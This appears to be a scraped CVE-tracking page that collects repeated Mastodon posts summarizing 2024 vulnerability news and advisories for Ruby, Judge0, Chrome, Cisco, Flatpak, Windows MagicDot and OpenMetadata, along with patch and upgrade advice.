  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2024-2782
(0 None)

EPSS: 0.00%

8 posts

N/A

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

CVE-2024-28189
(0 None)

EPSS: 0.04%

4 posts

N/A

jos1264@social.skynetcloud.site at 2024-04-30T17:45:04.000Z ##

Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover securityweek.com/critical-vuln #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0

##

jos1264@social.skynetcloud.site at 2024-04-30T17:45:02.000Z ##

Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover securityweek.com/critical-vuln #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0

##

screaminggoat at 2024-04-29T13:52:07.868Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

##

screaminggoat@infosec.exchange at 2024-04-29T13:52:07.000Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability

##

CVE-2024-29021
(0 None)

EPSS: 0.04%

4 posts

N/A

jos1264@social.skynetcloud.site at 2024-04-30T17:45:04.000Z ##

Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover securityweek.com/critical-vuln #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0

##

jos1264@social.skynetcloud.site at 2024-04-30T17:45:02.000Z ##

Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover securityweek.com/critical-vuln #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0

##

screaminggoat at 2024-04-29T13:52:07.868Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

##

screaminggoat@infosec.exchange at 2024-04-29T13:52:07.000Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability

##

CVE-2024-4058
(0 None)

EPSS: 0.00%

1 posts

N/A

screaminggoat at 2024-04-24T11:21:29.621Z ##

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 chromereleases.googleblog.com/

  • CVE-2024-4058 (critical) Type Confusion in ANGLE
  • CVE-2024-4059 (high) Out of bounds read in V8 API
  • CVE-2024-4060 (high) Use after free in Dawn

##

CVE-2024-4059
(0 None)

EPSS: 0.00%

1 posts

N/A

screaminggoat at 2024-04-24T11:21:29.621Z ##

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 chromereleases.googleblog.com/

  • CVE-2024-4058 (critical) Type Confusion in ANGLE
  • CVE-2024-4059 (high) Out of bounds read in V8 API
  • CVE-2024-4060 (high) Use after free in Dawn

##

CVE-2024-4060
(0 None)

EPSS: 0.00%

1 posts

N/A

screaminggoat at 2024-04-24T11:21:29.621Z ##

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 chromereleases.googleblog.com/

  • CVE-2024-4058 (critical) Type Confusion in ANGLE
  • CVE-2024-4059 (high) Out of bounds read in V8 API
  • CVE-2024-4060 (high) Use after free in Dawn

##

CVE-2024-202358
(0 None)

EPSS: 0.00%

4 posts

N/A

screaminggoat at 2024-04-24T20:18:30.442Z ##

While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability

CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.

##

screaminggoat@infosec.exchange at 2024-04-24T20:18:30.000Z ##

While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability

CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.

#Cisco #vulnerability #CVE_2024_202358 #ASA

##

screaminggoat at 2024-04-24T20:18:30.442Z ##

While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability

CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.

##

screaminggoat@infosec.exchange at 2024-04-24T20:18:30.000Z ##

While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability

CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.

#Cisco #vulnerability #CVE_2024_202358 #ASA

##

pentesttools at 2024-04-30T11:33:10.581Z ##

Hi there! You look like someone who appreciates the finer things in . 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

pentesttools@infosec.exchange at 2024-04-30T11:33:10.000Z ##

Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

CVE-2024-32462
(0 None)

EPSS: 0.04%

6 posts

N/A

TheEvilSkeleton@treehouse.systems at 2024-04-29T17:37:24.000Z ##

Flatpak just received a new update 👀

New features:

  • Automatically reload D-Bus session bus configuration after installing or upgrading apps, to pick up any exported D-Bus services

Bug fixes:

  • Expand the list of environment variables that Flatpak apps do not inherit from the host system
  • Don't refuse to start apps when there is no D-Bus system bus available
  • Don't try to repeat migration of apps whose data was migrated to a new name and then deleted
  • Fix warnings from newer GLib versions
  • Always set the container environment variable
  • In flatpak ps, add xdg-desktop-portal-gnome to the list of backends we'll use to learn which apps are running in the background
  • Avoid leaking a temporary variable from /etc/profile.d/flatpak.sh into the shell environment
  • Avoid undefined behaviour of signed left-shift when storing object IDs in a hash table
  • Fix Docbook validity in documentation
  • Skip more tests when FUSE isn't available
  • Fix a misleading comment in the test for CVE-2024-32462

Internal changes:

  • Fix Github Workflows recipes

github.com/flatpak/flatpak/rel

#Flatpak #FOSS #Container #Containers #OpenSource #Sandbox

##

jcrabapple@dmv.community at 2024-04-19T16:45:29.000Z ##

Found and patched!

CVE-2024-32462: Sandbox escape via RequestBackground portal and CWE-88 · Advisory · flatpak/flatpak

github.com/flatpak/flatpak/sec

#Linux #Flatpak

##

governa@fosstodon.org at 2024-04-19T07:37:49.000Z ##

#Flatpak Patch Addresses Major Sandbox Escape Flaw

Critical CVE-2024-32462 exposed in Flatpak, allowing unauthorized code execution. Update urgently to fixed versions 1.14.6 and above.

linuxiac.com/flatpak-patch-add

##

TheEvilSkeleton@treehouse.systems at 2024-04-29T17:37:24.000Z ##

Flatpak just received a new update 👀

New features:

  • Automatically reload D-Bus session bus configuration after installing or upgrading apps, to pick up any exported D-Bus services

Bug fixes:

  • Expand the list of environment variables that Flatpak apps do not inherit from the host system
  • Don't refuse to start apps when there is no D-Bus system bus available
  • Don't try to repeat migration of apps whose data was migrated to a new name and then deleted
  • Fix warnings from newer GLib versions
  • Always set the container environment variable
  • In flatpak ps, add xdg-desktop-portal-gnome to the list of backends we'll use to learn which apps are running in the background
  • Avoid leaking a temporary variable from /etc/profile.d/flatpak.sh into the shell environment
  • Avoid undefined behaviour of signed left-shift when storing object IDs in a hash table
  • Fix Docbook validity in documentation
  • Skip more tests when FUSE isn't available
  • Fix a misleading comment in the test for CVE-2024-32462

Internal changes:

  • Fix Github Workflows recipes

github.com/flatpak/flatpak/rel

#Flatpak #FOSS #Container #Containers #OpenSource #Sandbox

##

jcrabapple@dmv.community at 2024-04-19T16:45:29.000Z ##

Found and patched!

CVE-2024-32462: Sandbox escape via RequestBackground portal and CWE-88 · Advisory · flatpak/flatpak

github.com/flatpak/flatpak/sec

#Linux #Flatpak

##

governa@fosstodon.org at 2024-04-19T07:37:49.000Z ##

#Flatpak Patch Addresses Major Sandbox Escape Flaw

Critical CVE-2024-32462 exposed in Flatpak, allowing unauthorized code execution. Update urgently to fixed versions 1.14.6 and above.

linuxiac.com/flatpak-patch-add

##

CVE-2024-202359
(0 None)

EPSS: 0.00%

2 posts

N/A

CVE-2024-202353
(0 None)

EPSS: 0.00%

2 posts

N/A

CVE-2024-27282
(0 None)

EPSS: 0.00%

3 posts

N/A

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

zundan@mastodon.zunda.ninja at 2024-04-25T01:45:20.000Z ##

> スクリプト言語「Ruby」の開発チームは4月23日、「Ruby」の正規表現(Regex)検索に任意のメモリアドレスを読み取られる脆弱性(CVE-2024-27282)があることを明らかにした。修正版がリリースされている。

「Ruby 3」系統の正規表現コンパイラーに情報漏えいの脆弱性、修正版がリリース
v3.0.7、v3.1.5、v3.2.4、v3.3.1への更新を
https://forest.watch.impress.co.jp/docs/news/1586881.html

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

CVE-2024-32657
(0 None)

EPSS: 0.04%

2 posts

N/A

delroth@delroth.net at 2024-04-22T18:42:14.000Z ##

Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.

github.com/NixOS/hydra/securit

Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...

##

delroth@delroth.net at 2024-04-22T18:42:14.000Z ##

Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.

github.com/NixOS/hydra/securit

Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...

##

CVE-2023-42757
(0 None)

EPSS: 0.00%

2 posts

N/A

screaminggoat at 2024-04-22T13:54:40.550Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

##

simontsui@infosec.exchange at 2024-04-22T13:54:40.000Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

#MagicDot #CVE_2023_42757 #CVE_2023_32054 #CVE_2023_36396

##

CVE-2024-26132
(0 None)

EPSS: 0.04%

1 posts

N/A

oversecurity@mastodon.social at 2024-04-18T09:10:25.000Z ##

Element Android CVE-2024-26131, CVE-2024-26132 - Never Take Intents From Strangers

A writeup about two intent-based Android vulnerabilities CVE-2024-26131 and CVE-2024-26132 in Element (Matrix).

🔗️ [Shielder] link.is.it/xwp7qw

##

CVE-2024-26131
(0 None)

EPSS: 0.04%

1 posts

N/A

oversecurity@mastodon.social at 2024-04-18T09:10:25.000Z ##

Element Android CVE-2024-26131, CVE-2024-26132 - Never Take Intents From Strangers

A writeup about two intent-based Android vulnerabilities CVE-2024-26131 and CVE-2024-26132 in Element (Matrix).

🔗️ [Shielder] link.is.it/xwp7qw

##

CVE-2024-28254
(0 None)

EPSS: 0.05%

1 posts

N/A

simontsui@infosec.exchange at 2024-04-17T17:11:36.000Z ##

Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 microsoft.com/en-us/security/b

#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC

##

simontsui@infosec.exchange at 2024-04-17T17:11:36.000Z ##

Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 microsoft.com/en-us/security/b

#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC

##

CVE-2024-20373
(0 None)

EPSS: 0.00%

1 posts

N/A

simontsui@infosec.exchange at 2024-04-17T17:00:24.000Z ##

Cisco released 3 security advisories:

  • CVE-2024-20356 (8.7 high) Cisco Integrated Management Controller Web-Based Management Interface Command Injection Vulnerability
  • CVE-2024-20373 (5.3 medium) Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability
  • CVE-2024-20295 (8.8 high) Cisco Integrated Management Controller CLI Command Injection Vulnerability

Please note that a proof of concept was publicly disclosed for CVE-2024-20295 before it was patched, making this a zero-day. The Cisco PSIRT is not aware of any malicious use of the vulnerabilities that were described in these advisories. But don't take my word for it, go check them out yourself.

#Cisco #PatchTuesday #zeroday #proofofconcept #CVE_2024_20356 #CVE_2024_20373 #CVE_2024_20295

##

Visit counter For Websites